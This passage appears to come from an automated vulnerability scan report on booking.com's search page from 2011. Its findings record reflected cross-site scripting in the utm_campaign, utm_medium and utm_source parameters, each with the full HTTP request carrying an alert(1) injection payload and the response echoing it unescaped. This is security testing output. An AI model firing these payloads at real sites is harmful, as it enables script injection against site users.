Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:57 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5susnz%2B%2FDu3gSLqTPdzNwjL1I31V18mXsyk%2B69o4hArL0OKvHY7Kvxwj%2FcgZmigWctGJ1I8DxF0klYwekrb3FoC7l6bC4F%2FwZdZsa5kL5Nmh1XfHCNJ5oo%2FXtK9R7YiCsOSh%2BjqEdDL6TMqC5TeCrXWE6v%2BrSM8rD3gdUVAEpLtgc3gen6DZBzHBoPAoLjnC4WBKp6OBP7Q3tiiqYk9NDtsGWxemU47Z%2BMoxA8POHqotE71C5A4vF48j24O%2FCZlcrPZEbc87ZpzAz0QKGCwgQKgpKHO1k9Aj2lYuw2O1TdoIxkB%2Bo4eWFfmvwvMPjrKl06Iy2ZcPitxBzMDzgZ1%2F8IcYlc%2B%2FkZfWatmGVFlDCKuHTiqfaNUtGx2m2xYUCzy7wrvTz6JkE7HR6W3ZBRm2ZpfI5rJF28c5wcjjejf%2Fv3Jv9OpNobBE%2BbviS3yOnLz5MH%2FOkk24CHnh9JuZK1NBR%2BX8wP4MNI0Ov7OxqbjBnZRCpDReLBXz1Km2ZJpYnlHi8MnngZS0P%2FILX3fr3Ye66Oqe%2BNmRWlFaZw7%2BCYmd0YHWaX5d6NBSdkanZ1A7bIf1dB5Cn72aU1lL6BlqjL0gmYTEqeVwP8R3UKPU9j5Zu4pDJzEc8BtyHRb1s8mahDBNPVU5aPn3MDKvq%2FzQVmDFIBt3G7PZoFREA6013wbEBTKOODkPU7tYLoCnQz7tKg0VLErVZR7rgUWSv83%2BNCbzMAjWOv1McpFlGqs10hRuY2oqOL4hg%2B%2FkFkUZWxeAXcDyO7niEAhh5cDk%2B7FtJiruZk7UjlIIOkmi7AtdSYPtiVfmWy2XyRaEePDaNYvLdgYAMKWDqcw%2F4Cq8CKkx6Nq%2Bcyj03kgRWK%2BLRJ6qVWF4DG0UP8zx6uka2E3%2ByBBMTfLnNzdJrjWT7nd8mgsORG5rcYhwQS31vxq30nM1DZ8gpEanOzcFFE7b9W6p40WLfwDQxU4%2F%2FJ3biLhupzFVKBd6BSguynGz2KqSK7GWxbzqNNREF%2B0NCsdiUO4D2vm9HIR8HivsRIk9xfWdAe0XCEYwA1AEmDwyhIOW9tIbDcBmmXDIzquoHdyzYVhdrM7rRurpn%2B3NsvEaDq2Gor%2FL%2Bff%2BZPJLY%2BPpYU9vglbi%2BnuGkD%2F1r080ujwTUBnjl2KozFRR0hFeROgz9isiSrAPndMU2NRoDtp76u0Og8DWfGylv1YhVp2QB%2BnhrdEtchfJMtCXbdLZRJ470FxtyCTQNtUMh2RRrhlahpIGtIFZYU8FEHcKA12q6bK6f6PKT4x12g1LcD5unUaC92tuIYarrp6o%2BMCzkadCmzF%2BxchVjKX%2Bg37X46gRVzRNUIBznsyd78J2pRNcjWN0fgNpMnIu4QWxtDzKbyswZaQvIm6d%2BOpHj%2FAH7XS1Gmp6u0bw%2Fy7TJDVSlcMeherAaIhyNqqguHm6JNsKHIbXGD%2FB%2FtQWqidx5W2pN72zdnhw5sA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:58 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391700
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=usbc213'-alert(1)-'d336623f81e;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room
...[SNIP]...
4.229. http://www.booking.com/searchresults.html [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb8cc"><script>alert(1)</script>57787d45fe3 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=useb8cc"><script>alert(1)</script>57787d45fe3&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:45 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR5vMROsGtdOqni7xd6cAoVKhb9Ewrb6Lle4B6NIh%2BeUKE%2FggOQrYAARfRfTk%2FntY6BuH3F23N88F0MYpNE8DZESnvUMJzvMPYTJJbCGaTCXvK7PgYDOCCkYbMqNK0aFTOvRdjyPlnbUt3yBl%2FKeELAGkfwuNs7wtO5FrbpZdC%2BGuh5pJ%2FXnHhl0s8smu70gfITKTEqQnLkdNP2swIQiLwsn5HW7AgBBPW8meEkgiIgqYtkKjPKWOumbneCFfhRBRM3Zan%2FbDJiNWwjaBHZ7Vojg2ki1eQcLuVnpuYnsleDaQ0%2BtAMyfw7uFhZFFvaT24D4vKfiXoWtng2CubCJkQG2T5lUJblD7UeJq0soh%2BmDVsBpX1JOzeQFoeMa9r2mRnPm9g5XkV%2F96eblnu4CogCLXEDNtTwIPA73sjBYzRwnyWIyxWgTvtisuVxRUHssC%2F81zGOR59ECx6tZ7Wu2yaLjE7r1FQDcu4qyuEUVM7SQpwEnTbF7EMOBabe4X0XoyIs8%2FWg6D5WeHtTcYQF6VrJosKum3C%2FhVbd9sF16fnM%2FfDA5kEXwVlkiEk3UPrVzp6geugHCpksA8oRAalaWVEBWmEifvZ3DuBqCHJWNKW8tncuUnpbhe8GGZtQlC0nO0LAZKCStnSJ9fD%2FQoMqPZfQGHUvnE9aEur3yX%2BZr%2F62z%2Bw6lyy6AyDpxA8XA%2BWPkbFWjcmy5HpPkrKF%2BJxwyv0WoPmHhTXoPBXwDq%2BzG3gxZX7nA%2FeILCZORwYeHt7T%2F%2F4DPUKSB96zivdChbc9Lad2hcal2mu6hlKBcXiFFUGqSsYRpmiG%2FsGTnS%2BFS4FqmZtu2fFh%2BEFuUKypicKdWNZPQcp%2F%2BPtyQh5otLuimAnQcKO6zKsyN18aC%2Fq5sifX8dglWmSI%2B3WXEOa6Uf1exetE2hrPjqT0QwLMnF%2Bnro8G5b1oQrdBHYz4ct2%2B1Tsz8Ioqj75rDT%2BA59dp24qxQ9JIxvW9RkGAJOXo8mbg2s2bXGsmy23ujsoZYwkkU6ArufHV0Dda7pr%2FNXWYOSgKkMt0EFTjHJiwHPM9k5cToEaT4Q9CxaDc3H3ErqDEi7XIxKQ%2FNAzcq7mZGRO4K3pfjJnJdgDnNcSzhCDaaZcIn%2BVIjggqyzrjOdR3oJtZv9zISJIeKxkOfGPMKaohuyUn1dU%2FrSxG1ingSm5XWFugDbEb7OLDcXYVwhxKIKBCfI2xBdx6H5eLVKxu9xBuZQDpA7Cs%2FlMo%2FQPGz6op%2F4gkKarg1JqbsBUPlA%2F%2BUIEDuYRF1rdLHukwKJi9jx32xOHl0PzUaXLtQ9dfnzjtqOEoi%2BtFyZTCmKV%2BypmV22aE17phqZ74dYrnGpLeuoSdcE2d4wODafuhFLr4C5ZiPAqkevvxXjnz2%2FZeqpsZeNU9zsqdwn07LxMu2KMATmsYb0rL3tu%2FCo3AUWf%2BEWU8A%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:46 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391937
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=useb8cc"><script>alert(1)</script>57787d45fe3;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...
4.230. http://www.booking.com/searchresults.html [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32e1c'-alert(1)-'2f7b3175511 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC32e1c'-alert(1)-'2f7b3175511&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:40 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR5vMROsGtdOqni7xd6cAoVKhb9Ewrb6Lle4B6NIh%2BeUKFpHaVQ7I%2Bv2i0aU%2BoaHw1r6PzmyXv7KVvGiCgLVPhQ6xPTakka1dxZQ6DCxQDenu2rKiqZKZqtvOkBYMROrZcYscHarlS0s7caQOq7nq3HKgynVWmhc%2BlY9pf305Cjlkerg4Jj4TrEqt5zC5NpPTYEVlGB5UYVzGTjsTFsmoa7rApNujeJYw4vDthwNtsu59UJvV3LjvWDEZewz6nel%2FZG7MFWiCdIGDAqj%2FQBsJcNs3TgR0Le%2FZGj3AM5pahsQ3D%2FFFqALqSexi2UskddoQI988xx9RagbWgNdS5914aH%2BxwZIVj9Yzrl2u2UahUdOMNE67j0Wpg9USYE7BCx7x5gw5jRq3gkyGDsHs7X5azsE6gd4YxBgrcvmk6%2FwQ4myyDPMdDBRookjmYUSevnUnEGrE2aRLJqPWUC5Y01RreLHG8HcAiM%2Frep%2BhvtHxIF1BO1wi10seHEIB4bku1IYb9BvGWLMpEE%2BoQoYfTDQqssblitzzammcyZB7ROio8UMprtvtuFzqAF%2FAPIeuXdOjr79OojBGEDzmIRvOqAr%2FzHqjHqwH8vybt8jm%2BwghUUXTyYb%2BkcSrMcftFJTKdV6wMBm6e1DdZXRZoLtm%2F6RaIpTpUL7mqF5SZaYa9iLTDtkdE0INDYPnz4l%2F3doDwLsb6htopKghBmiUNuMgnVRkK1bIGQATiYxOf3YEk6E6hTmrzINROFan7tNgw%2BgpKScZ%2FOBucZ%2FC5yPObCPdfvgfGkTPt11Jval%2FBWy8sHblLazlePrycG7KtE7LG5qYZ5I9Act%2FNJfFQ3zu7WFjb61FerlqV3%2FFpUKixv26VQQ%2FfPxquPe7nn56jZrp9vEXPPoCPlrJv0Ryp95KQUfr3A4eOEu9ZzvmgPAMEQo7lGdth0WBOHc0k9KCymkhyxM6%2B4Mtg7%2Ff2ban4VPW%2B%2FmqCHrImkQNggAXbUB4BrkuEhTuMQkltBEy54S0UkvNg0GKvwS85JnKW6XaO0aeZU6xW0rrA%2FcBMf8fiEw1yJx7%2FhlklXCvXJQ02%2FV5wkThSA8rMWwsAOXZNPtv2miewev8XywH2B%2Fq1j1fe%2FH9L6q8CJ%2BrJ%2Ba7z%2FJmSKwuTK%2BR6Hb%2FcE2ZBB%2FshMe57V5AOO%2B41V1bFbRECurpEBVkK%2BED26jLqJ6z8bl%2Fsk8L7ijEFOOALX6%2F7YKGWm1srlHPCpvUI5nspeIKlsTTmri23%2FL4222e2PEt2lMwkgoGqpgURE6qpexWMCDA2E6BRDvxmw8ZKCeK%2BSzEHzEWZToeTN0Ts8wdUGrPs39rNHZuwKKDlRQ5nsy3mwS7JO8wOYxiVmVLTQgGBDGO02pnt85NjEBTiAun69wP%2BVRLYYOShIgYyUOGgVDsThfMmtpdNCwxeobrdNWu4ItGJ6pVZisVgQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:41 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391878
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC32e1c'-alert(1)-'2f7b3175511;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room types';



...[SNIP]...
4.231. http://www.booking.com/searchresults.html [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 344aa"><script>alert(1)</script>815550adb7c was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC344aa"><script>alert(1)</script>815550adb7c&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:28 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR5vMROsGtdOqni7xd6cAoVKhb9Ewrb6Lle4B6NIh%2BeUKFpHaVQ7I%2Bv2i0aU%2BoaHw1r6PzmyXv7KVvGiCgLVPhQ6xPTakka1dxZQ6DCxQDenu2rKiqZKZqtvOkBYMROrZcYscHarlS0s7caQOq7nq3HKgynVWmhc%2BlY9pf305Cjlkerg4Jj4TrEqt5zC5NpPTYEVlGB5UYVzGTjsTFsmoa7rApNujeJYw4vDthwNtsu59UJvV3LjvWDEZewz6nel%2FZG7MFWiCdIGDAqj%2FQBsJcNs3TgR0Le%2FZGj3AM5pahsQ3D%2FFFqALqSexi2UskddoQI988xx9RagbWgNdS5914aH%2BxwZIVj9Yzrl2u2UahUdOMNE67j0Wpg9USYE7BCx7x5gw5jRq3gkyGDsHs7X5azsE6gd4YxBgrcvmk6%2FwQ4myyDPMdDBRookjmYUSevnUnEGrE2aRLJqPWUC5Y01RreLHG8HcAiM%2Frep%2BhvtHxIF1BO1wi10seHEIB4bku1IYb9BvGWLMpEE%2BoQoYfTDQqssblitzzammcyZB7ROio8UMprtvtuFzqAF%2FAPIeuXdOjr79OojBGEDzmIRvOqAr%2FzHqjHqwH8vybt8jm%2BwghUUXTyYb%2BkcSrMcftFJTKdV6wMBm6e1DdZXRZoLtm%2F6RaIpTpUL7mqF5SZaYa9iLTDtkdE0INDYPnz4l%2F3doDwLsb6htopKghBmiUNuMgnVRkK1bIGQATiYxOf3YEk6E6hTmrzINROFan7tNgw%2BgpKScZ%2FOBucZ%2FC5yPObCPdfvgfGkTPt11Jval%2FBWy8sHblLazlePrycG7KtE7LG5qYZ5I9Act%2FNJfFQ3zu7WFjb61FerlqV3%2FFpUKixv26VQQ%2FfPxquPe7nn56jZrp9vEXPPoCPlrJv0Ryp95KQUfr3A4eOEu9ZzvmgPAMEQo7lGdth0WBOHc0k9KCymkhyxM6%2B4Mtg7%2Ff2ban4VPW%2B%2FmqCHrImkQNggAXbUB4BrkuEhTuMQkltBEy54S0UkvNg0GKvwS85JnKW6XaO0aeZU6xW0rrA%2FcBMf8fiEw1yJx7%2FhlklXCvXJQ02%2FV5wkThSA8rMWwsAOXZNPtv2miewev8XywH2B%2Fq1j1fe%2FH9L6q8CJ%2BrJ%2Ba7z%2FJmSKwuTK%2BR6Hb%2FcE2ZBB%2FshMe57V5AOO%2B41V1bFbRECurpEBVkK%2BED26jLqJ6z8bl%2Fsk8L7ijEFOOALX6%2F7YKGWm1srlHPCpvUI5nspeIKlsTTmri23%2FL4222e2PEt2lMwkgoGqpgURE6qpexWMIS389g8%2F8mZI8lwWGE9JksdaLbXuVy9N3SCRjLVKcjXf9SwBm%2FyUAPg%2FDHVvRr496Vy1mwhjyryHxJpGrf9UUt4kvnV3TiKnD0AXB0L05Tdyrgx18h6JceMtd7UHLp6b4odk3WLeoEiy7YIzluKXRP4yeiIYXMRLw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:29 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391937
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC344aa"><script>alert(1)</script>815550adb7c;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...
4.232. http://www.booking.com/searchresults.html [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f430'-alert(1)-'dcfb36c82fd was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo7f430'-alert(1)-'dcfb36c82fd&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c